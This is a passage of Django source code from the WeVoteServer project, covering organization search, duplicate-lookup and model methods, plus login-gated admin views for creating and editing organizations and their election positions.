new_filter = Q(organization_name__icontains=organization_name)
# # Find entries with any word in the string - DALE 2016-05-06 This didn't feel right
# from functools import reduce
# organization_name_list = organization_name.split(" ")
# new_filter = reduce(lambda x, y: x | y,
# [Q(organization_name__icontains=word) for word in organization_name_list])
filters.append(new_filter)
if positive_value_exists(organization_twitter_handle):
new_filter = Q(organization_twitter_handle__icontains=organization_twitter_handle)
filters.append(new_filter)
if positive_value_exists(organization_website):
new_filter = Q(organization_website__icontains=organization_website)
filters.append(new_filter)
if positive_value_exists(organization_email):
new_filter = Q(organization_email__icontains=organization_email)
filters.append(new_filter)
if positive_value_exists(organization_facebook):
new_filter = Q(organization_facebook__icontains=organization_facebook)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
organization_objects_list = Organization.objects.filter(final_filters)
if len(organization_objects_list):
organizations_found = True
status = 'ORGANIZATIONS_RETRIEVED'
for organization in organization_objects_list:
one_organization_json = {
'organization_id': organization.id,
'organization_we_vote_id': organization.we_vote_id,
'organization_name':
organization.organization_name if positive_value_exists(
organization.organization_name) else '',
'organization_website': organization.organization_website if positive_value_exists(
organization.organization_website) else '',
'organization_twitter_handle':
organization.organization_twitter_handle if positive_value_exists(
organization.organization_twitter_handle) else '',
'organization_email':
organization.organization_email if positive_value_exists(
organization.organization_email) else '',
'organization_facebook':
organization.organization_facebook if positive_value_exists(
organization.organization_facebook) else '',
}
organization_list_for_json.append(one_organization_json)
else:
organizations_found = False
status = 'NO_ORGANIZATIONS_RETRIEVED'
success = True
except Organization.DoesNotExist:
# No organizations found. Not a problem.
organizations_found = False
status = 'NO_ORGANIZATIONS_FOUND_DoesNotExist'
success = True # We are still successful if no organizations are found
except Exception as e:
organizations_found = False
handle_exception(e, logger=logger)
status = 'FAILED organization_search_find_any_possibilities ' \
'{error} [type: {error_type}]'.format(error=e.message, error_type=type(e))
success = False
results = {
'status': status,
'success': success,
'organizations_found': organizations_found,
'organizations_list': organization_list_for_json,
}
return results
def retrieve_organizations_by_id_list(self, organization_ids_followed_by_voter):
organization_list = []
organization_list_found = False
if not type(organization_ids_followed_by_voter) is list:
status = 'NO_ORGANIZATIONS_FOUND_MISSING_ORGANIZATION_LIST'
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list,
}
return results
if not len(organization_ids_followed_by_voter):
status = 'NO_ORGANIZATIONS_FOUND_NO_ORGANIZATIONS_IN_LIST'
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list,
}
return results
try:
organization_queryset = Organization.objects.all()
organization_queryset = organization_queryset.filter(
id__in=organization_ids_followed_by_voter)
organization_queryset = organization_queryset.order_by('organization_name')
organization_list = organization_queryset
if len(organization_list):
organization_list_found = True
status = 'ORGANIZATIONS_FOUND_BY_ORGANIZATION_LIST'
else:
status = 'NO_ORGANIZATIONS_FOUND_BY_ORGANIZATION_LIST'
success = True
except Exception as e:
status = 'retrieve_organizations_by_id_list: Unable to retrieve organizations from db. ' \
'{error} [type: {error_type}]'.format(error=e.message, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list,
}
return results
def retrieve_organizations_from_non_unique_identifiers(self, twitter_handle):
organization_list_objects = []
organization_list_found = False
twitter_handle_filtered = extract_twitter_handle_from_text_string(twitter_handle)
try:
organization_queryset = Organization.objects.all()
organization_queryset = organization_queryset.filter(
organization_twitter_handle__iexact=twitter_handle_filtered)
# If multiple organizations claim the same Twitter handle, select the one with... ??
# organization_queryset = organization_queryset.order_by('-twitter_followers_count')
organization_list_objects = organization_queryset
if len(organization_list_objects):
organization_list_found = True
status = 'ORGANIZATIONS_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
else:
status = 'NO_ORGANIZATIONS_RETRIEVED_FROM_TWITTER_HANDLE'
success = True
except Organization.DoesNotExist:
# No organizations found. Not a problem.
status = 'NO_ORGANIZATIONS_FOUND_FROM_TWITTER_HANDLE_DoesNotExist'
organization_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_organizations_from_non_unique_identifiers ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list_objects,
}
return results
def retrieve_possible_duplicate_organizations(self, organization_name, organization_twitter_handle, vote_smart_id,
we_vote_id_from_master=''):
organization_list_objects = []
filters = []
organization_list_found = False
try:
organization_queryset = Organization.objects.all()
# Ignore entries with we_vote_id coming in from master server
if positive_value_exists(we_vote_id_from_master):
organization_queryset = organization_queryset.filter(~Q(we_vote_id__iexact=we_vote_id_from_master))
# We want to find organizations with *any* of these values
if positive_value_exists(organization_name):
new_filter = Q(organization_name__iexact=organization_name)
filters.append(new_filter)
if positive_value_exists(organization_twitter_handle):
new_filter = Q(organization_twitter_handle__iexact=organization_twitter_handle)
filters.append(new_filter)
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id=vote_smart_id)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
organization_queryset = organization_queryset.filter(final_filters)
organization_list_objects = organization_queryset
if len(organization_list_objects):
organization_list_found = True
status = 'DUPLICATE_ORGANIZATIONS_RETRIEVED'
success = True
else:
status = 'NO_DUPLICATE_ORGANIZATIONS_RETRIEVED'
success = True
except Organization.DoesNotExist:
# No organizations found. Not a problem.
status = 'NO_DUPLICATE_ORGANIZATIONS_FOUND_DoesNotExist'
organization_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_possible_duplicate_organizations ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'organization_list_found': organization_list_found,
'organization_list': organization_list_objects,
}
return results
class Organization(models.Model):
# We are relying on built-in Python id field
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our org info with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "org", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_org_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, null=True, blank=True, unique=True)
organization_name = models.CharField(
verbose_name="organization name", max_length=255, null=False, blank=False)
organization_website = models.URLField(verbose_name='url of the endorsing organization', blank=True, null=True)
organization_email = models.EmailField(
verbose_name='organization contact email address', max_length=255, unique=False, null=True, blank=True)
organization_contact_name = models.CharField(max_length=255, null=True, unique=False)
organization_facebook = models.URLField(verbose_name='url of facebook page', blank=True, null=True)
organization_image = models.CharField(verbose_name='organization image', max_length=255, null=True, unique=False)
state_served_code = models.CharField(verbose_name="state this organization serves", max_length=2,
null=True, blank=True)
# The vote_smart special interest group sigId for this organization
vote_smart_id = models.BigIntegerField(
verbose_name="vote smart special interest group id", null=True, blank=True, unique=True)
organization_description = models.TextField(
verbose_name="Text description of this organization.", null=True, blank=True)
organization_address = models.CharField(
verbose_name='organization street address', max_length=255, unique=False, null=True, blank=True)
organization_city = models.CharField(max_length=255, null=True, blank=True)
organization_state = models.CharField(max_length=2, null=True, blank=True)
organization_zip = models.CharField(max_length=255, null=True, blank=True)
organization_phone1 = models.CharField(max_length=255, null=True, blank=True)
organization_phone2 = models.CharField(max_length=255, null=True, blank=True)
organization_fax = models.CharField(max_length=255, null=True, blank=True)
twitter_user_id = models.BigIntegerField(verbose_name="twitter id", null=True, blank=True)
organization_twitter_handle = models.CharField(
verbose_name='organization twitter screen_name', max_length=255, null=True, unique=False)
twitter_name = models.CharField(
verbose_name="org name from twitter", max_length=255, null=True, blank=True)
twitter_location = models.CharField(
verbose_name="org location from twitter", max_length=255, null=True, blank=True)
twitter_followers_count = models.IntegerField(verbose_name="number of twitter followers",
null=False, blank=True, default=0)
twitter_profile_image_url_https = models.URLField(verbose_name='url of user logo from twitter',
blank=True, null=True)
twitter_profile_background_image_url_https = models.URLField(verbose_name='tile-able background from twitter',
blank=True, null=True)
twitter_profile_banner_url_https = models.URLField(verbose_name='profile banner image from twitter',
blank=True, null=True)
twitter_description = models.CharField(verbose_name="Text description of this organization from twitter.",
max_length=255, null=True, blank=True)
wikipedia_page_id = models.BigIntegerField(verbose_name="pageid", null=True, blank=True)
wikipedia_page_title = models.CharField(
verbose_name="Page title on Wikipedia", max_length=255, null=True, blank=True)
wikipedia_thumbnail_url = models.URLField(verbose_name='url of wikipedia logo thumbnail', blank=True, null=True)
wikipedia_thumbnail_width = models.IntegerField(verbose_name="width of photo", null=True, blank=True)
wikipedia_thumbnail_height = models.IntegerField(verbose_name="height of photo", null=True, blank=True)
wikipedia_photo_url = models.URLField(verbose_name='url of wikipedia logo', blank=True, null=True)
ballotpedia_page_title = models.CharField(
verbose_name="Page title on Ballotpedia", max_length=255, null=True, blank=True)
ballotpedia_photo_url = models.URLField(verbose_name='url of ballotpedia logo', blank=True, null=True)
NONPROFIT_501C3 = '3'
NONPROFIT_501C4 = '4'
POLITICAL_ACTION_COMMITTEE = 'P'
CORPORATION = 'C'
NEWS_CORPORATION = 'N'
UNKNOWN = 'U'
ORGANIZATION_TYPE_CHOICES = (
(NONPROFIT_501C3, 'Nonprofit 501c3'),
(NONPROFIT_501C4, 'Nonprofit 501c4'),
(POLITICAL_ACTION_COMMITTEE, 'Political Action Committee'),
(CORPORATION, 'Corporation'),
(NEWS_CORPORATION, 'News Corporation'),
(UNKNOWN, 'Unknown'),
)
organization_type = models.CharField(
verbose_name="type of org", max_length=1, choices=ORGANIZATION_TYPE_CHOICES, default=UNKNOWN)
def __unicode__(self):
return str(self.organization_name)
def organization_photo_url(self):
if positive_value_exists(self.organization_image):
return self.organization_image
elif positive_value_exists(self.twitter_profile_image_url_https):
return self.twitter_profile_image_url_https_bigger()
elif positive_value_exists(self.wikipedia_photo_url):
return self.wikipedia_photo_url
return ''
def twitter_profile_image_url_https_bigger(self):
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "_bigger")
else:
return ''
def twitter_profile_image_url_https_original(self):
if self.twitter_profile_image_url_https:
return self.twitter_profile_image_url_https.replace("_normal", "")
else:
return ''
class Meta:
ordering = ('organization_name',)
objects = OrganizationManager()
@classmethod
def create(cls, organization_name, organization_website, organization_twitter_handle, organization_email,
organization_facebook, organization_image):
organization = cls(organization_name=organization_name,
organization_website=organization_website,
organization_twitter_handle=organization_twitter_handle,
organization_email=organization_email,
organization_facebook=organization_facebook,
organization_image=organization_image)
return organization
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this organization came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_org_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "org" = tells us this is a unique id for an org
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}org{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
# TODO we need to deal with the situation where we_vote_id is NOT unique on save
super(Organization, self).save(*args, **kwargs)
def is_nonprofit_501c3(self):
return self.organization_type in self.NONPROFIT_501C3
def is_nonprofit_501c4(self):
return self.organization_type in self.NONPROFIT_501C4
def is_political_action_committee(self):
return self.organization_type in self.POLITICAL_ACTION_COMMITTEE
def is_corporation(self):
return self.organization_type in self.CORPORATION
def is_news_corporation(self):
return self.organization_type in self.NEWS_CORPORATION
def is_organization_type_specified(self):
return self.organization_type in (
self.NONPROFIT_501C3, self.NONPROFIT_501C4, self.POLITICAL_ACTION_COMMITTEE,
self.CORPORATION, self.NEWS_CORPORATION)
def generate_facebook_link(self):
if self.organization_facebook:
return "https://facebook.com/{facebook_page}".format(facebook_page=self.organization_facebook)
else:
return ''
def generate_twitter_link(self):
if self.organization_twitter_handle:
return "https://twitter.com/{twitter_handle}".format(twitter_handle=self.organization_twitter_handle)
else:
return ''
def generate_wikipedia_link(self):
if self.wikipedia_page_title:
encoded_page_title = self.wikipedia_page_title.replace(" ", "_")
return "https://en.wikipedia.org/wiki/{page_title}".format(page_title=encoded_page_title)
else:
return ''
```
#### File: WeVoteServer/organization/views_admin.py
```python
from .controllers import organizations_import_from_master_server
from .models import Organization
from .serializers import OrganizationSerializer
from admin_tools.views import redirect_to_sign_in_page
from candidate.models import CandidateCampaign, CandidateCampaignListManager, CandidateCampaignManager
from django.db.models import Q
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from exception.models import handle_record_found_more_than_one_exception,\
handle_record_not_deleted_exception, handle_record_not_found_exception, handle_record_not_saved_exception
from election.models import Election, ElectionManager
from measure.models import ContestMeasure, ContestMeasureList, ContestMeasureManager
from organization.models import OrganizationListManager, OrganizationManager
from position.models import PositionEntered, PositionEnteredManager, INFORMATION_ONLY, OPPOSE, \
STILL_DECIDING, SUPPORT
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import retrieve_voter_authority, voter_has_authority
from voter_guide.models import VoterGuideManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, positive_value_exists, \
STATE_CODE_MAP
ORGANIZATION_STANCE_CHOICES = (
(SUPPORT, 'We Support'),
(OPPOSE, 'We Oppose'),
(INFORMATION_ONLY, 'Information Only - No stance'),
(STILL_DECIDING, 'We Are Still Deciding Our Stance'),
)
logger = wevote_functions.admin.get_logger(__name__)
# This page does not need to be protected.
class OrganizationsSyncOutView(APIView):
def __str__(self):
return str("")
def get(self, request, format=None):
state_served_code = request.GET.get('state_served_code', '')
organization_list = Organization.objects.all()
if positive_value_exists(state_served_code):
organization_list = organization_list.filter(state_served_code__iexact=state_served_code)
serializer = OrganizationSerializer(organization_list, many=True, allow_null=True)
return Response(serializer.data)
@login_required
def organizations_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = organizations_import_from_master_server(request, state_code)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Organizations import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def organization_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_state_code = request.GET.get('organization_state', '')
google_civic_election_id = request.GET.get('google_civic_election_id', '')
candidate_we_vote_id = request.GET.get('candidate_we_vote_id', '')
organization_search = request.GET.get('organization_search', '')
messages_on_stage = get_messages(request)
organization_list_query = Organization.objects.all()
if positive_value_exists(organization_state_code):
organization_list_query = organization_list_query.filter(state_served_code__iexact=organization_state_code)
if positive_value_exists(organization_search):
filters = []
new_filter = Q(organization_name__icontains=organization_search)
filters.append(new_filter)
new_filter = Q(organization_twitter_handle__icontains=organization_search)
filters.append(new_filter)
new_filter = Q(organization_website__icontains=organization_search)
filters.append(new_filter)
new_filter = Q(we_vote_id__icontains=organization_search)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
organization_list_query = organization_list_query.filter(final_filters)
organization_list_query = organization_list_query.order_by('organization_name')
organization_list = organization_list_query
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
template_values = {
'messages_on_stage': messages_on_stage,
'candidate_we_vote_id': candidate_we_vote_id,
'google_civic_election_id': google_civic_election_id,
'organization_list': organization_list,
'organization_search': organization_search,
'organization_state': organization_state_code,
'state_list': sorted_state_list,
}
return render(request, 'organization/organization_list.html', template_values)
@login_required
def organization_new_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# A positive value in google_civic_election_id means we want to create a voter guide for this org for this election
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
}
return render(request, 'organization/organization_edit.html', template_values)
@login_required
def organization_edit_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# A positive value in google_civic_election_id means we want to create a voter guide for this org for this election
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
organization_on_stage_found = False
organization_manager = OrganizationManager()
organization_on_stage = Organization()
state_served_code = ''
results = organization_manager.retrieve_organization(organization_id)
if results['organization_found']:
organization_on_stage = results['organization']
state_served_code = organization_on_stage.state_served_code
organization_on_stage_found = True
election_manager = ElectionManager()
upcoming_election_list = []
results = election_manager.retrieve_upcoming_elections()
if results['success']:
upcoming_election_list = results['election_list']
state_list = STATE_CODE_MAP
sorted_state_list = sorted(state_list.items())
if organization_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
'state_served_code': state_served_code,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
'upcoming_election_list': upcoming_election_list,
'google_civic_election_id': google_civic_election_id,
'state_list': sorted_state_list,
}
return render(request, 'organization/organization_edit.html', template_values)
@login_required
def organization_edit_process_view(request):
"""
Process the new or edit organization forms
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_id = convert_to_int(request.POST.get('organization_id', 0))
organization_name = request.POST.get('organization_name', '')
organization_twitter_handle = request.POST.get('organization_twitter_handle', False)
organization_facebook = request.POST.get('organization_facebook', False)
organization_website = request.POST.get('organization_website', False)
wikipedia_page_title = request.POST.get('wikipedia_page_title', False)
wikipedia_photo_url = request.POST.get('wikipedia_photo_url', False)
state_served_code = request.POST.get('state_served_code', False)
# A positive value in google_civic_election_id or add_organization_button means we want to create a voter guide
# for this org for this election
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
# add_organization_button = request.POST.get('add_organization_button', False)
# Filter incoming data
organization_twitter_handle = extract_twitter_handle_from_text_string(organization_twitter_handle)
# Check to see if this organization is already being used anywhere
organization_on_stage_found = False
try:
organization_query = Organization.objects.filter(id=organization_id)
if organization_query.count():
organization_on_stage = organization_query[0]
organization_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if organization_on_stage_found:
# Update
if organization_name is not False:
organization_on_stage.organization_name = organization_name
if organization_twitter_handle is not False:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_facebook is not False:
organization_on_stage.organization_facebook = organization_facebook
if organization_website is not False:
organization_on_stage.organization_website = organization_website
if wikipedia_page_title is not False:
organization_on_stage.wikipedia_page_title = wikipedia_page_title
if wikipedia_photo_url is not False:
organization_on_stage.wikipedia_photo_url = wikipedia_photo_url
if state_served_code is not False:
organization_on_stage.state_served_code = state_served_code
organization_on_stage.save()
organization_id = organization_on_stage.id
organization_we_vote_id = organization_on_stage.we_vote_id
messages.add_message(request, messages.INFO, 'Organization updated.')
else:
# Create new
# But first double-check that we don't have an org entry already
organization_email = ''
organization_list_manager = OrganizationListManager()
results = organization_list_manager.organization_search_find_any_possibilities(
organization_name, organization_twitter_handle, organization_website, organization_email)
if results['organizations_found']:
organizations_list = results['organizations_list']
organizations_count = len(organizations_list)
messages.add_message(request, messages.INFO, 'We found {count} existing organizations '
'that might match.'.format(count=organizations_count))
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'organizations_list': organizations_list,
'organization_name': organization_name,
'organization_twitter_handle': organization_twitter_handle,
'organization_facebook': organization_facebook,
'organization_website': organization_website,
'wikipedia_page_title': wikipedia_page_title,
'wikipedia_photo_url': wikipedia_photo_url,
}
return render(request, 'organization/organization_edit.html', template_values)
minimum_required_variables_exist = positive_value_exists(organization_name)
if not minimum_required_variables_exist:
messages.add_message(request, messages.INFO, 'Missing name, which is required.')
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'organization_name': organization_name,
'organization_twitter_handle': organization_twitter_handle,
'organization_facebook': organization_facebook,
'organization_website': organization_website,
'wikipedia_page_title': wikipedia_page_title,
'wikipedia_photo_url': wikipedia_photo_url,
}
return render(request, 'voter_guide/voter_guide_search.html', template_values)
organization_on_stage = Organization(
organization_name=organization_name,
)
if organization_twitter_handle is not False:
organization_on_stage.organization_twitter_handle = organization_twitter_handle
if organization_facebook is not False:
organization_on_stage.organization_facebook = organization_facebook
if organization_website is not False:
organization_on_stage.organization_website = organization_website
if wikipedia_page_title is not False:
organization_on_stage.wikipedia_page_title = wikipedia_page_title
if wikipedia_photo_url is not False:
organization_on_stage.wikipedia_photo_url = wikipedia_photo_url
if state_served_code is not False:
organization_on_stage.state_served_code = state_served_code
organization_on_stage.save()
organization_id = organization_on_stage.id
organization_we_vote_id = organization_on_stage.we_vote_id
messages.add_message(request, messages.INFO, 'New organization saved.')
except Exception as e:
messages.add_message(request, messages.ERROR, 'Could not save organization.'
' {error} [type: {error_type}]'.format(error=e,
error_type=type(e)))
return HttpResponseRedirect(reverse('organization:organization_list', args=()))
# Create voter_guide for this election?
if positive_value_exists(google_civic_election_id) and positive_value_exists(organization_we_vote_id):
election_manager = ElectionManager()
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
election = results['election']
voter_guide_manager = VoterGuideManager()
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
organization_we_vote_id, google_civic_election_id)
if results['voter_guide_saved']:
messages.add_message(request, messages.INFO, 'Voter guide for {election_name} election saved.'
''.format(election_name=election.election_name))
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id))
@login_required
def organization_position_list_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
candidate_we_vote_id = request.GET.get('candidate_we_vote_id', '')
organization_on_stage = Organization()
organization_on_stage_found = False
try:
organization_query = Organization.objects.filter(id=organization_id)
if organization_query.count():
organization_on_stage = organization_query[0]
organization_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
organization_on_stage_found = False
if not organization_on_stage_found:
messages.add_message(request, messages.ERROR,
'Could not find organization when trying to retrieve positions.')
return HttpResponseRedirect(reverse('organization:organization_list', args=()))
else:
organization_position_list_found = False
try:
organization_position_list = PositionEntered.objects.order_by('stance')
organization_position_list = organization_position_list.filter(organization_id=organization_id)
if positive_value_exists(google_civic_election_id):
organization_position_list = organization_position_list.filter(
google_civic_election_id=google_civic_election_id)
organization_position_list = organization_position_list.order_by(
'google_civic_election_id', '-vote_smart_time_span')
if len(organization_position_list):
organization_position_list_found = True
except Exception as e:
organization_position_list = []
for one_position in organization_position_list:
position_manager = PositionEnteredManager()
one_position = position_manager.refresh_cached_position_info(one_position)
election_list = Election.objects.order_by('-election_day_text')
if organization_position_list_found:
template_values = {
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'organization_position_list': organization_position_list,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'candidate_we_vote_id': candidate_we_vote_id,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'candidate_we_vote_id': candidate_we_vote_id,
}
return render(request, 'organization/organization_position_list.html', template_values)
@login_required
def organization_position_new_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
authority_results = retrieve_voter_authority(request)
if not voter_has_authority(request, authority_required, authority_results):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
candidate_we_vote_id = request.GET.get('candidate_we_vote_id', False)
measure_we_vote_id = request.GET.get('measure_we_vote_id', False)
# Take in some incoming values
candidate_and_measure_not_found = request.GET.get('candidate_and_measure_not_found', False)
stance = request.GET.get('stance', SUPPORT) # Set a default if stance comes in empty
statement_text = request.GET.get('statement_text', '') # Set a default if stance comes in empty
more_info_url = request.GET.get('more_info_url', '')
# We pass candidate_we_vote_id to this page to pre-populate the form
candidate_campaign_id = 0
if positive_value_exists(candidate_we_vote_id):
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(candidate_we_vote_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
candidate_campaign_id = candidate_campaign.id
# We pass candidate_we_vote_id to this page to pre-populate the form
contest_measure_id = 0
if positive_value_exists(measure_we_vote_id):
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_we_vote_id(measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_id = contest_measure.id
messages_on_stage = get_messages(request)
organization_id = convert_to_int(organization_id)
all_is_well = True
organization_on_stage_found = False
organization_on_stage = Organization()
try:
organization_on_stage = Organization.objects.get(id=organization_id)
organization_on_stage_found = True
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Organization.DoesNotExist:
# This is fine, create new
pass
if not organization_on_stage_found:
messages.add_message(request, messages.INFO,
'Could not find organization when trying to create a new position.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
# Prepare a drop down of candidates competing in this election
candidate_campaign_list = CandidateCampaignListManager()
candidate_campaigns_for_this_election_list = []
results = candidate_campaign_list.retrieve_all_candidates_for_upcoming_election(google_civic_election_id, True)
if results['candidate_list_found']:
candidate_campaigns_for_this_election_list = results['candidate_list_objects']
# Prepare a drop down of measures in this election
contest_measure_list = ContestMeasureList()
contest_measures_for_this_election_list = []
results = contest_measure_list.retrieve_all_measures_for_upcoming_election(google_civic_election_id, True)
if results['measure_list_found']:
contest_measures_for_this_election_list = results['measure_list_objects']
try:
organization_position_list = PositionEntered.objects.order_by('stance')
organization_position_list = organization_position_list.filter(organization_id=organization_id)
if positive_value_exists(google_civic_election_id):
organization_position_list = organization_position_list.filter(
google_civic_election_id=google_civic_election_id)
organization_position_list = organization_position_list.order_by(
'google_civic_election_id', '-vote_smart_time_span')
if len(organization_position_list):
organization_position_list_found = True
except Exception as e:
organization_position_list = []
if all_is_well:
election_list = Election.objects.order_by('-election_day_text')
template_values = {
'candidate_campaigns_for_this_election_list': candidate_campaigns_for_this_election_list,
'candidate_campaign_id': candidate_campaign_id,
'contest_measures_for_this_election_list': contest_measures_for_this_election_list,
'contest_measure_id': contest_measure_id,
'messages_on_stage': messages_on_stage,
'organization': organization_on_stage,
'organization_position_candidate_campaign_id': 0,
'possible_stances_list': ORGANIZATION_STANCE_CHOICES,
'stance_selected': stance,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
'organization_position_list': organization_position_list,
'voter_authority': authority_results,
# Incoming values from error state
'candidate_and_measure_not_found': candidate_and_measure_not_found,
'stance': stance,
'statement_text': statement_text,
'more_info_url': more_info_url,
}
return render(request, 'organization/organization_position_edit.html', template_values)
@login_required
def organization_delete_existing_position_process_form_view(request, organization_id, position_we_vote_id):
"""
:param request:
:param organization_id:
:param position_we_vote_id:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_id = convert_to_int(organization_id)
# Get the existing position
organization_position_on_stage_found = False
if positive_value_exists(position_we_vote_id):
organization_position_on_stage = PositionEntered()
organization_position_on_stage_found = False
position_entered_manager = PositionEnteredManager()
results = position_entered_manager.retrieve_position_from_we_vote_id(position_we_vote_id)
if results['position_found']:
organization_position_on_stage_found = True
organization_position_on_stage = results['position']
if not organization_position_on_stage_found:
messages.add_message(request, messages.INFO,
"Could not find this organization's position when trying to delete.")
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
try:
organization_position_on_stage.delete()
except Exception as e:
handle_record_not_deleted_exception(e, logger=logger)
messages.add_message(request, messages.ERROR,
'Could not delete position.')
return HttpResponseRedirect(reverse('organization:organization_position_list', args=([organization_id])))
messages.add_message(request, messages.INFO,
'Position deleted.')
return HttpResponseRedirect(reverse('organization:organization_position_edit', args=([organization_id])))
@login_required
def organization_position_edit_view(request, organization_id, position_we_vote_id):
"""
In edit, you can only change your stance and comments, not who or what the position is about
:param request:
:param organization_id:
:param position_we_vote_id:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
